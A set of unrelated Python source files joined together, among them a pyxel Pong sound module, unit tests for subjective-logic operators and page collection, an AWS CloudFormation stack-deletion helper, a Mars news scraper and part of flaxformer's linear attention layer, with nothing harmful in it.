_CInternalFieldDeg(_l,_p0,_p1,_p2,_MaxDeg,_B0,_B1,_B2) return _B0,_B1,_B2 neopenx/Dragon # -------------------------------------------------------- # Dragon # Copyright(c) 2017 SeetaTech # Written by # -------------------------------------------------------- # config from dragon.config import * import dragon.config as config # core from dragon.core.tensor import Tensor import dragon.core.workspace as workspace # ops from dragon.ops import * # updaters from dragon.updaters import * # theano utilities from dragon.vm.theano.compile.function import function as function from dragon.vm.theano.tensor import grad as grad # scope from dragon.core.scope import TensorScope as name_scope from dragon.core.scope import PhaseScope as phase_scope from dragon.core.scope import DeviceScope as device_scope TatchNicolas/pongpongpy/sounds.py from enum import Enum import pyxel # FIXME: このへんの構造よくわかってない # ch: 独立して音楽再生できる空間? # sound: 音を登録しておく場所? 
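
# Illustrative sketch (not part of the original module), addressing the FIXME
# above: pyxel exposes a bank of numbered sound slots and a small set of
# playback channels. A sound is registered once with pyxel.sound(slot).set(...)
# and then played on a channel with pyxel.play(channel, slot) -- the same calls
# used by init_sounds() and play_se() further below. The slot and channel
# numbers here are arbitrary examples, and pyxel.init(...) must have been
# called beforehand.
def _example_register_and_play_beep():
    beep_slot = 10  # arbitrary free sound slot
    pyxel.sound(beep_slot).set(
        note="c3", tone="s", volume="4", effect="f", speed=10
    )
    pyxel.play(0, beep_slot)  # channel 0, one-shot playback
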
class SoundChannel(Enum): SE = 0 BGM = 1 class Sound(Enum): LEFT_POINT = 1 RIGHT_POINT = 2 BGM_1 = 30 BGM_2 = 31 BGM_3 = 32 class Music(Enum): MAIN_BGM = 0 def init_sounds(): """ Soundの初期登録をする """ # 左側チームの得点音 pyxel.sound(Sound.LEFT_POINT.value).set( note="c3e3g3c4c4", tone="s", volume="4", effect=("n" * 4 + "f"), speed=5 ) # 右側チームの得点音 pyxel.sound(Sound.RIGHT_POINT.value).set( note="f3b2f2b1", tone="p", volume="4", effect=("n" * 7 + "f"), speed=5, ) # BGM # とりあえずサンプルを拝借 melody = ( "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 c3c3c3c3 d3d3d3d3 e3e3e3e3" + "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 g2g2g2g2 c3c3c3c3 g2g2a2a2" + "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 c3c3c3c3 d3d3d3d3 e3e3e3e3" + "f3f3f3a3 a3a3a3a3 g3g3g3b3 b3b3b3b3" + "b3b3b3b4 rrrr e3d3c3g3 a2g2e2d2" ) harmony1 = ( "a1 a1 a1 b1 f1 f1 c2 c2" "c2 c2 c2 c2 g1 g1 b1 b1" * 3 + "f1 f1 f1 f1 f1 f1 f1 f1 g1 g1 g1 g1 g1 g1 g1 g1" ) harmony2 = ( ("f1" * 8 + "g1" * 8 + "a1" * 8 + ("c2" * 7 + "d2")) * 3 + "f1" * 16 + "g1" * 16 ) pyxel.sound(Sound.BGM_2.value).set( note=harmony1 * 2 + harmony2 * 2, tone="t", volume="5", effect="f", speed=20 ) pyxel.sound(Sound.BGM_3.value).set( note=("f0 r a4 r f0 f0 a4 r" "f0 r a4 r f0 f0 a4 f0"), tone="n", volume="6622 6622 6622 6426", effect="f", speed=20, ) pyxel.sound(Sound.BGM_1.value).set( note=melody, tone="s", volume=("3"), effect=("nnnsffff"), speed=20, ) ch0 = [] ch1 = [Sound.BGM_1.value, ] ch2 = [Sound.BGM_2.value, ] ch3 = [Sound.BGM_3.value, ] pyxel.music(Music.MAIN_BGM.value).set(ch0, ch1, ch2, ch3) def play_se(se: Sound): pyxel.play(SoundChannel.SE.value, se.value) def play_bgm(): pyxel.playm(Music.MAIN_BGM.value, loop=True) _base_ = [ '../_base_/models/deeplabv3plus_r50-d8-cospcl.py', '../_base_/datasets/pascal_voc12_aug.py', '../_base_/default_runtime.py', '../_base_/schedules/schedule_40k.py' ] model = dict( decode_head=dict(num_classes=21, loss_decode=dict(type='KLPatchContrastiveLoss', use_sigmoid=False, loss_weight=0.25, cal_function='COS07', cal_gate=99)), auxiliary_head=dict(num_classes=21),) optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) sundaycat/Leetcode-Practice def find_word_concatenation(str, words): if len(words) == 0 or len(words[0]) == 0: return [] rs, word_freq = [], {} for word in words: if word not in word_freq: word_freq[word] = 0 word_freq[word] += 1 num_of_words, word_len = len(words), len(words[0]) for i in range(len(str) - word_len * num_of_words + 1): word_seen, j = {}, 0 while j < num_of_words: start, end = i + j * word_len, i + (j + 1) * word_len word = str[start : end] # break if we dont need this word if word not in word_freq: break if word not in word_seen: word_seen[word] = 0 word_seen[word] += 1 # no need to proceed further if the word has higher frequency than required if word_seen[word] > word_freq[word]: break if j == num_of_words - 1: rs.append(i) j +=1 return rs """ an unittest package Copyright (c) 2013 <> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest import mpmath import subjective_logic.operators as operators from subjective_logic.Opinion import Opinion class OperatorsTestCase(unittest.TestCase): def setUp(self): self.third = Opinion("1/3", "1/3", "1/3", "1/2") self.nobelief = Opinion("0","1/2","1/2","1/2") self.belief = Opinion("1", "0", "0", "1/2") self.disbelief = Opinion("0", "1", "0", "1/2") self.uncertainty = Opinion("0", "0", "1", "1/2") while True: r1 = mpmath.rand() r2 = mpmath.rand() if r1 + r2 < 1: self.random = Opinion(r1, r2, mpmath.mpf("1") - (r1 + r2), "1/2") break def test_operator_merge_discount1(self): self.assertEqual(operators.graphical_discount_merge([[self.belief, self.belief],[self.belief, self.uncertainty],[self.belief, self.disbelief]]), self.third, self.third.__repr__() + " is not what we got: " + operators.graphical_discount_merge([[self.belief, self.belief],[self.belief, self.uncertainty],[self.belief, self.disbelief]]).__repr__()) #def tearDown(self): # self.foo.dispose() # self.foo = None def test_operators_discount_raise(self): self.assertRaisesRegexp(Exception, "Two valid Opinions are required!", operators.discount, 3, 2) def test_operators_discount1(self): a = Opinion("0", "1", "0", "1/2") b = Opinion("1", "0", "0", "1/2") c = Opinion("0", "0", "1", "1/2") self.assertEqual(operators.discount(a, b), c, "<0,1,0,0.5> \\ctimes <1,0,0,0.5> = "+repr(operators.discount(a, b))+" != <0,0,1,0.5> ") def test_operators_gcombination_raise(self): self.assertRaisesRegexp(Exception, "Two valid Opinions are required!", operators.discount, 3, 2) def test_operators_gcombination_req1(self): t = self.third c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_req2(self): t = self.third c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_req3(self): t = self.third c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req1(self): t = self.nobelief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req2(self): t = self.nobelief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req3(self): t = self.nobelief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def 
test_operators_gcombination_rand_req1(self): t = self.random c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_rand_req2(self): t = self.random c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_rand_req3(self): t = self.random c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req1(self): t = self.belief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req2(self): t = self.belief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req3(self): t = self.belief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req1(self): t = self.disbelief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req2(self): t = self.disbelief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req3(self): t = self.disbelief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req1(self): t = self.uncertainty c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req2(self): t = self.uncertainty c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req3(self): t = self.uncertainty c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) if __name__ == '__main__': unittest.main() """Test page collection.""" from textwrap import dedent import pytest import yaml from mccole.accounting import Config, Info from mccole.collect import collect_pages from mccole.util import McColeExc def test_collect_chapters_key_missing(): assert collect_pages(Config()) == [] def test_collect_single_chapter(): config = Config(src="src", dst="dst", chapters=[{"slug": "first", "title": "First"}]) collect_pages(config) assert config.pages 
== [ Info( slug="first", title="First", to_root="..", src="src/first/index.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) ] def test_collect_chapters_and_appendices(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First"}, {"slug": "second", "title": "Second"}, {"slug": "third", "title": "Third", "appendix": True}, {"slug": "fourth", "title": "Fourth"}, ]) collect_pages(config) assert [e.slug for e in config.pages] == [ "first", "second", "third", "fourth", ] assert [e.major for e in config.pages] == [1, 2, "A", "B"] def test_collect_with_root(): config = Config(src="src", dst="dst", root="test.md", chapters=[ {"slug": "first", "title": "First"} ]) collect_pages(config) assert len(config.pages) == 2 index_entry = Info( slug="_index", to_root=".", src="src/test.md", dst="dst/index.html", major=None, template="index.html", tokens=None, ) assert index_entry in config.pages chapter_entry = Info( slug="first", title="First", to_root="..", src="src/first/index.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) assert chapter_entry in config.pages def test_collect_missing_slug(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First"}, {"key": "value"} ]) with pytest.raises(McColeExc): collect_pages(config) def test_collect_explicit_source_file(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First", "file": "something.md"} ]) collect_pages(config) assert config.pages == [ Info( slug="first", title="First", to_root="..", src="src/something.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) ] import botocore import click def delete_stacks(**kwargs): """Deletes all stacks with the specified job-identifier""" session = kwargs['session'] job_identifier = kwargs['job_identifier'] cfn_client = session.client('cloudformation') stack_names = sorted([stack['StackName'] for stack in cfn_client.describe_stacks()[ 'Stacks'] if "{}-".format(job_identifier) in stack['StackName']]) choice = click.confirm( "Do you want to delete these stacks? : {}".format(stack_names)) if choice: for stack_name in reversed(stack_names): cfn_client.delete_stack(StackName=stack_name) try: cfn_client.get_waiter('stack_delete_complete').wait( StackName=stack_name) click.echo("Deleted {}.".format(stack_name)) except botocore.exceptions.WaiterError as waiter_error: click.echo("{} failed to delete. 
{}".format( stack_name, waiter_error)) click.echo("Stopped stack deletion.") break import pandas as pd import os from bs4 import BeautifulSoup as bs from urllib.request import urlopen from splinter import Browser from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager def init(): executable_path = {'executable_path': ChromeDriverManager().install()} chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--disable-dev-shm-usage") chrome_options.add_argument("--no-sandbox") browser = Browser('chrome', **executable_path, headless=True) return browser def scrape_nasa(): nasa_news_site_url = 'https://mars.nasa.gov/news/' html = urlopen(nasa_news_site_url) nasa_news_data = bs(html, 'lxml') nasa_news = { 'title': nasa_news_data.find_all("div", {"class": "content_title"})[0].text.strip('\n'), 'paragraph': nasa_news_data.find_all("div", {"class": "rollover_description_inner"})[0].text.strip('\n') } return nasa_news def scrape_featured_image(): browser=init() featured_image_site_url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html' browser.visit(featured_image_site_url) html = browser.html featured_image_data = bs(html, 'html.parser') imgLinkString=featured_image_data.find_all("a",{"class": "showimg fancybox-thumbs"}) browser.quit() featured_image_url="https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/"+imgLinkString[0]['href'] return featured_image_url def scrape_mars_facts(): mars_facts_site_url = 'https://space-facts.com/mars/' mars_facts = pd.DataFrame(pd.read_html(mars_facts_site_url)[0]) html_table = mars_facts.to_html() return html_table def scrape_hemispheres(): image_urls=[] browser=init() hemisphere_images_site_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' for i in range(0,4): browser.visit(hemisphere_images_site_url) browser.find_by_css("a.product-item h3")[i].click() html = browser.html hemisphere_data = bs(html, "html.parser") title = hemisphere_data.find('h2').text image_url = hemisphere_data.find_all('a','target'=='_blank')[4]["href"] image_url = { "title": title, "img_url": image_url} image_urls.append(image_url) browser.quit() return image_urls def testing(): test_mars_facts_site_url = 'https://space-facts.com/mars/' test_mars_facts = pd.read_html(test_mars_facts_site_url)[0] fact_list = [] count = 0 for i in test_mars_facts[0]: fact_list.append([i,test_mars_facts[1][count]]) count +=1 return(fact_list) def scrape_all(): scraped_data = { 'nasa_news': scrape_nasa(), 'featured_image': scrape_featured_image(), 'mars_facts': testing(), 'hemispheres': scrape_hemispheres(), 'if_blank': '' } return scraped_data blank_data = { 'nasa_news': {'title':'No Value', 'title':'No Value'}, 'featured_image': 'broken_img.jpeg', 'mars_facts': [['No', 'Value']], 'hemispheres': [{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'}], 'if_blank': "Oh no, you don't have any data! Try scraping some below!" }tomweingarten/flaxformerflaxformer/components/attention/linear_attention.py # Copyright 2022 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Linear attention classes.""" # pylint: disable=attribute-defined-outside-init,g-bare-generic import abc import functools from typing import Callable, Optional, Tuple, Union import flax from flax import linen as nn import flax.core.variables as variables from flax.linen import initializers from flax.linen.linear import default_kernel_init import jax from jax import lax import jax.numpy as jnp from flaxformer import activation_partitioning from flaxformer.components import dense from flaxformer.components import embedding from flaxformer.types import Array from flaxformer.types import DType from flaxformer.types import Initializer class LinearAttention(metaclass=abc.ABCMeta): """API for attention classes that compute a linear approximation of the attention matrix. This allows for 1D vectors masking the key/value part of the attention """ @abc.abstractmethod def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True) -> Array: """Applies attention on the input data. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., num_heads, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. Returns: output of shape `[batch_sizes..., length, features]`. """ class MultiHeadLinearAttention(nn.Module, LinearAttention): """Multi-head linear attention. Attributes: num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1]) should be divisible by the number of heads. use_bias: bool: whether pointwise QKVO dense transforms use bias. dtype: the dtype of the computation (default: float32) qkv_features: dimension of the key, query, and value. head_dim: dimension of each head. If unspecified, it defaults to qkv_features // num_heads. out_features: dimension of the last projection broadcast_dropout: bool: use a broadcasted dropout along batch dims. dropout_rate: dropout rate precision: numerical precision of the computation see `jax.lax.Precision` for details. kernel_init: initializer for the kernel of the Dense layers. bias_init: initializer for the bias of the Dense layers. attention_fn: dot_product_attention or compatible function. Accepts query, key, value, and returns output of shape `[bs, dim1, dim2, ..., dimN,, num_heads, value_channels]`` use_extra_logit: whether to include a virtual extra logit equal to zero. float32_logits: bool, if True then compute logits in float32 to avoid numerical issues with bfloat16. output_projection: Project the output of `attention_fn` to `out_features`. If False, returns the output of `attention_fn` without a projection. split_head_kernel: whether to store QKVO variables with a split head dimension. kernels_to_fuse: Which kernels to fuse, if any. 
use_rotary_embedding: whether to use rotary embeddings. """ num_heads: int use_bias: bool dtype: DType = jnp.float32 qkv_features: Optional[int] = None head_dim: Optional[int] = None out_features: Optional[int] = None broadcast_dropout: bool = True dropout_rate: float = 0. precision: Optional[lax.Precision] = None kernel_init: Initializer = default_kernel_init bias_init: Initializer = initializers.zeros rescale_logits: bool = False attention_fn: Callable[..., Array] = None use_extra_logit: bool = False float32_logits: bool = False output_projection: bool = True # TODO: Remove out_features and output_projection. split_head_kernel: bool = False kernels_to_fuse: Optional[str] = None use_rotary_embedding: bool = False rotary_embedding_max_timescale: float = 1e4 # Whether to shard over the head dimension, setting this to False when the # number of heads is not divisible your activation num_partitions sharding_over_head_dimension: bool = True def update_cache_prefill( self, key: Array, value: Array, cached_key: variables.Variable, cached_value: variables.Variable, cache_index: variables.Variable, prefill_lengths: Array ) -> Tuple[Array, Array, Array, Array, Array, Array]: """Update the autoregressive cache for multiple timesteps at once. This is useful for things like a prefix-lm where the encoder section of the input is visible bidirectionally. The key and value for this section need to be computed in a single shot, as a step by step approach would result in causal attention. Args: key: The calculated key used in attention. [batch..., length, num_heads, features_per_head] value: The calculated value used in attention. [batch..., length, num_heads, features_per_head] cached_key: The cache of previous keys. [batch..., num_heads, features_per_head, length] cached_value: The cache of previous values. [batch..., num_heads, features_per_head, length] cache_index: The timestep that we are currently calculating the key and value for. [batch] prefill_lengths: The number of timesteps we should fill in the cache. [batch] Returns: The key, value, and the last timestep we just filled in the cache. We also return the new cache values for now because assigning to a variable inside of a method doesn't work. These returns will be removed eventually. """ # Make a reference to the data underlaying the variable for ease of # use. cache_index.value = prefill_lengths # Note, the cache index is now a vector # of batch size so that each example can start just after it's # prefix which can be different lengths for different examples. cur_index = cache_index.value # Move the sequence dimension to the end to match the cache shapes. key_cached = jnp.moveaxis(key, -3, -1) value_cached = jnp.moveaxis(value, -3, -1) # Reshape the index so the batch is at the beginning, default # broadcasting behavior is to add singleton dims to the front but # we need them at the end. batch_first_index = jnp.reshape( cur_index, (-1,) + tuple(1 for _ in range(cached_key.value.ndim - 1))) # Calculate a mask that will set any position past the prefix to zero # when applied to the key. key_mask = ( lax.broadcasted_iota(jnp.int32, cached_key.value.shape, cached_key.value.ndim - 1) < batch_first_index) value_mask = ( lax.broadcasted_iota(jnp.int32, cached_value.value.shape, cached_value.value.ndim - 1) < batch_first_index) # Set the caches with the calculated key and values but hide anything # past the prefix. 
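    # key_mask/value_mask above are boolean tensors of the cache shape
    # [batch..., num_heads, features_per_head, length] that are True only for
    # positions strictly before each example's prefill length, so the
    # element-wise products below zero out every cache column at or beyond the
    # end of the prefix.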
cached_key_value = key_cached * key_mask cached_value_value = value_cached * value_mask return (key, value, cur_index, cached_key_value, cached_value_value, prefill_lengths) def update_cache_decode( self, key: Array, value: Array, cached_key: variables.Variable, cached_value: variables.Variable, cache_index: variables.Variable ) -> Tuple[Array, Array, Array, Array, Array, Array]: """Update the next timestep in the autoregressive cache. This is used during step by step decoding where each key and value we get are a single (the next) timestep. Args: key: The calculated key used in attention. [batch..., 1, num_heads, features_per_head] value: The calculated value used in attention. [batch..., 1, num_heads, features_per_head] cached_key: The cache of previous keys. [batch..., num_heads, features_per_head, length] cached_value: The cache of previous values. [batch..., num_heads, features_per_head, length] cache_index: The timestep that we are currently calculating the key and value for. [batch] if we are decoding after doing a prefill or [1] if we are starting with step-by-step decoding. Returns: The key, value, and the last timestep we just filled in the cache. Note: this index is the last timestep we just fill, the actual value of the `cache_index` is already increased to point to the next timestep to fill. We also return the new cache values for now because assigning to a variable inside of a method doesn't work. These returns will be removed eventually. """ cache_length = cached_key.value.shape[-1] # Create a OHE of the current index. NOTE: the index is increased # below. # Note: We reshape the index into a column vector so that it will work # if the index is a scalar or a vector with different cache positions # from different elements in a batch. cur_index = jnp.reshape(cache_index.value, (-1,)) one_hot_indices = jax.nn.one_hot(cur_index, cache_length, dtype=key.dtype) # In order to update the key, value caches with the current key and # value, we move the length axis to the back, similar to what we did # for the cached ones above. # Note these are currently the key and value of a single position, # since we feed one position at a time. one_token_key = jnp.moveaxis(key, -3, -1) one_token_value = jnp.moveaxis(value, -3, -1) # The one hot indices are now either [1, length] for a scalar index or # [batch size, length] for examples where there are different lengths # of prefixes. We need to add dims for num_heads and num_features as # broadcasting doesn't work for the batched version. one_hot_indices = jnp.expand_dims( jnp.expand_dims(one_hot_indices, axis=1), axis=1) # Update key, value caches with our new 1d spatial slices. # We implement an efficient scatter into the cache via one-hot # broadcast and addition. # Key/Value have seq lengths of 1 while one_hot has a seq_length # of length. key/value will broadcast their value to each timestep # and the onehot will mask all but the correct timesteps. key = cached_key.value + one_token_key * one_hot_indices value = cached_value.value + one_token_value * one_hot_indices cached_key_value = key cached_value_value = value cache_index_value = cache_index.value + 1 # Move the keys and values back to their original shapes. 
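    # i.e. back to [batch..., length, num_heads, features_per_head]; after the
    # one-hot update these tensors hold the entire cache contents (all `length`
    # positions), not just the single new timestep.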
key = jnp.moveaxis(key, -1, -3) value = jnp.moveaxis(value, -1, -3) return (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) @nn.compact def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, bias: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True, prefill: bool = False, prefill_lengths: Optional[Array] = None) -> Array: """Applies multi-head dot product attention on the input data. Projects the inputs into multi-headed query, key, and value vectors, applies dot-product attention and project the results to an output vector. There are two modes: decoding and non-decoding (e.g., training). The mode is determined by `decode`. During decoding mode, this method is called twice, by `init` and `apply`. In the former, inputs_q: [batch..., length, qkv_features] and inputs_kv: [batch..., length, qkv_features] During apply, query, key and value all have the shape: [batch * beam, 1, qkv_features] where the batch dimension is added to include multiple beams. Note that the batch dimension is different during the init and apply calls. This is because the cached variables are directly passed-in during `apply` method. In other words, the cache variables such as `cached_key` are initialized with `batch` dim, expanded by tiling in the beam search function to `batch * beam` dimension, and passed to the `apply` method as part of a variable dict. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., {1, num_heads}, q_length, kv_length]`. bias: attention bias of shape `[batch_sizes..., num_heads, q_length, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. prefill: Whether to run a partial sequence to prefill the cache. prefill_lengths: The length of each partial sequence we are filling in the cache, lengths are inferred from the mask if not provided. Returns: If output_projection is True, then output of shape `[batch_sizes..., length, out_features]`, where out_features is set to features if not provided. If output_projection is False, then output of shape `[batch_sizes..., length, qkv_features]`, where qkv_features is set to features if not provided. """ validate_linear_attention_call_parameter_shapes(inputs_q, inputs_kv, mask, bias, self.num_heads) if precomputed_qkv is not None: raise ValueError('Support for precomputed QKVO not implemented.') rotary_index = None features = self.out_features or inputs_q.shape[-1] qkv_features = self.qkv_features or inputs_q.shape[-1] if self.head_dim is None: head_dim = qkv_features // self.num_heads else: head_dim = self.head_dim if self.kernels_to_fuse and not self.split_head_kernel: raise ValueError('Un-reshaped kernels are required when using QKV fused ' 'kernel optimization.') # Is attention logit rescaling explicit or folded into initializer? 
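    # When rescale_logits is False, the usual 1/sqrt(head_dim) attention scaling
    # is folded into the query kernel initializer below (kernel_init output is
    # divided by sqrt(head_dim)); when it is True, kernel_init is used unchanged
    # and the rescaling is left to the attention function itself.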
if self.rescale_logits: query_init = self.kernel_init else: if self.kernels_to_fuse: raise ValueError('Cannot fold in logit normalization to query ' 'initializer when using fused kernels.') depth_scaling = jnp.sqrt(head_dim).astype(self.dtype) query_init = lambda *args: self.kernel_init(*args) / depth_scaling make_dense = functools.partial( dense.DenseGeneral, axis=-1, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, ) # Project inputs_q to multi-headed q/k/v # dimensions are then [batch..., length, num_heads, features_per_head] if self.kernels_to_fuse is None: query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) key = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='key')( inputs_kv) value = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='value')( inputs_kv) # TODO: should we fuse/slice along depth or head dim? elif self.kernels_to_fuse == 'qkv': if inputs_q is not inputs_kv: raise ValueError('qkv fusion is only supported in self-attention mode ' '(when inputs_q is inputs_kv).') # 'qkv' fusion mode implies self-attention qkv = make_dense( kernel_init=self.kernel_init, features=(3, self.num_heads, head_dim), kernel_axis_names=['embed', 'unmodeled', 'heads', 'head_dim'], name='qkv_fused')( inputs_q) query = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 0, 1, -3), -3) key = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 1, 1, -3), -3) value = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 2, 1, -3), -3) elif self.kernels_to_fuse == 'kv': query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) kv = make_dense( kernel_init=self.kernel_init, features=(2, self.num_heads, head_dim), kernel_axis_names=['embed', 'unmodeled', 'heads', 'head_dim'], name='kv_fused')( inputs_kv) key = jnp.squeeze(lax.dynamic_slice_in_dim(kv, 0, 1, -3), -3) value = jnp.squeeze(lax.dynamic_slice_in_dim(kv, 1, 1, -3), -3) else: raise ValueError('Incorrect kernel fusion mode specified.') if self.sharding_over_head_dimension: query = activation_partitioning.with_sharding(query, 2) key = activation_partitioning.with_sharding(key, 2) value = activation_partitioning.with_sharding(value, 2) query: Array = query # hint to quiet pytype. key: Array = key value: Array = value if prefill and decode: raise ValueError('prefill and decode cannot both be true at the same' 'time. If you are using a prefix LM with bidirectional ' 'attention on the inputs, please make a call with ' 'prefill=True that includes an attention mask that ' 'covers your inputs first and then make your decoding ' 'calls.') if prefill or decode: # Detect if we're initializing by absence of existing cache data. is_initialized = self.has_variable('cache', 'cached_key') # The key and value have dimension # [batch..., length, num_heads, features_per_head], but we cache them as # [batch..., num_heads, features_per_head, length] as a TPU fusion # optimization. This also enable the "scatter via one-hot broadcast" # trick, which means we do a one-hot broadcast instead of a scatter/gather # operations, which gives a 3-4x speedup in practice. 
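    # Concretely: with the cache laid out as
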